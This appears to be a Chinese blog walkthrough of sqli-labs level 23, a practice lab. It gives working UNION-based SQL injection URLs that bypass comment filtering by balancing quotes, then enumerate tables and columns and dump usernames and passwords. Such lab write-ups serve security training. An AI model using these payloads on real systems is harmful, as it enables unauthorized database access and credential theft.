Sqlilabs-23

第 23 关对注入字符做了正则表达式的过滤,所以需要在引号上下功夫:
Sqlilabs-23

http://sqlilabs/Less-23/?id=1' and '1

知道了原理构造起来就很简单了:
–查表
http://sqlilabs/Less-23/?id=-1' union select 1,(select group_concat(table_name) from informatIon_schema.tables where table_schema=database()),3 and '1' = '1

简化:
http://sqlilabs/Less-23/?id=-1' union select 1,(select group_concat(table_name) from informatIon_schema.tables where table_schema=database()),'3

Sqlilabs-23

–查列
http://sqlilabs/Less-23/?id=-1' union select 1,(select group_concat(column_name) from informatIon_schema.columns where table_schema=database() and table_name='users'),'3

Sqlilabs-23

–查数据
http://sqlilabs/Less-23/?id=-1' union select 1,(select group_concat(username) from users),'3

Sqlilabs-23

http://sqlilabs/Less-23/?id=-1' union select 1,(select group_concat(password) from users),'3

Sqlilabs-23

????

相关文章:

  • 2021-05-29
  • 2022-01-20
  • 2021-04-04
  • 2021-04-13
  • 2021-09-02
  • 2021-06-16
  • 2021-10-24
  • 2022-01-20
猜你喜欢
  • 2021-12-14
  • 2021-05-11
  • 2021-08-10
  • 2022-01-22
  • 2021-11-13
  • 2021-05-09
  • 2021-11-12
相关资源
相似解决方案